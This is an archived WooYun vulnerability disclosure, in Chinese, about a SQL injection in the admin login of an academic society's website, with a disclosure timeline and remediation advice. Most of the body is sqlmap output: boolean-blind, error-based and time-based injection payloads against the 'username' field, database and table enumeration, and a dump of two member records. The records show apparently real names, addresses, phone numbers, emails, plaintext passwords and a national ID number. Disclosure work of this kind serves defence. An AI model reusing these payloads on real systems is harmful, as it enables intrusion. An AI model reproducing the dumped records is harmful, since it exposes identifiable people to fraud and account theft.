乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-15: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
听说厂商不错
POST /admin/logadmin.php HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/admin/login.phpCookie: PHPSESSID=bjgoj8dp2q76m7n7hnhcq17616Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 78username=admin&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16username参数存在注入
Place: POSTParameter: username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: username=admin' RLIKE IF(5126=5126,0x61646d696e,0x28) AND 'tyOj'='tyOj&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=admin' AND (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x3a6f73763a,(SELECT (CASE WHEN (8851=8851) THEN 1 ELSE 0 END)),0x3a69746b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xitt'='xitt&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16 Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: username=-3463' OR 8168=SLEEP(5) AND 'Zmqa'='Zmqa&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16---web server operating system: Linux Debianweb application technology: PHP 5.4.36, Apache 2.2.22back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] orsc_webDatabase: orsc_web[6 tables]+---------+| admin || conlist || const || content || member || message |+---------+web server operating system: Linux Debianweb application technology: PHP 5.4.36, Apache 2.2.22back-end DBMS: MySQL 5.0Database: orsc_web+--------+---------+| Table | Entries |+--------+---------+| member | 1184 |+--------+---------+随便跑两个用户看看Table: member[2 entries]| mem_id | mem_ri | mem_yue | mem_shi | mem_pic | mem_time | mem_name | mem_type | mem_nian | mem_zhuye | mem_email | mem_sheng | mem_dizhi | mem_minzu | mem_number | mem_wenhua | mem_jianli | mem_shouji | mem_danwei | mem_status | mem_dangpai | mem_dianhua | mem_xingbie | mem_youbian | mem_nicheng | mem_password | mem_zhicheng | mem_daoqishijian | mem_shenfenzheng | mem_zhichengdengji | mem_renzhiqingkuang || 8 | 9 | 1 | 海淀区 | uploadfile/pic/1352815576.jpg | 2012-11-13 10:01:06 | 刘德刚 | 1 | 1956 | http://**.**.**.** | dliu@**.**.**.** | 北京 | 北京中关村东路55号 | 汉族 | S391000910M | 博士 | | 13611228905 | 中国科学院数学与系统科学研究院 | 7 | 无 | 010-62651330 | 男 | 100190 | dliu | lb851215 | 副教授 | 2099 | 110108195601090035 | 高级 | 2000-今:中国运筹学会常务副秘书长 || 14 | 1 | 1 | 哈尔滨 | uploadfile/pic/1359356276.jpg | 2013-01-28 03:44:07 | 屈绍建 | 1 | 1978 | **.**.**.** | qushaojian@**.**.**.** | 黑龙江 | 哈尔滨市南岗区一匡街2号2H栋453室 | 汉 | S390020004M | 博士研究生 | <blank> | <blank> | 哈尔滨工业大学教师 | 7 | 共产党员 | 13199568196 | 男 | 150010 | qushaojian | qsj1978316 | 副教授 | 2099 | <blank> | 高级 | <blank> |后台
一、后台不要暴露二、sql注入参数化,过滤关键字
危害等级:中
漏洞Rank:9
确认时间:2015-10-19 18:16
CNVD确认并复现所述漏洞情况,已经转由CNCERT向中科院通报,由其后续协调网站管理单位处置。
暂无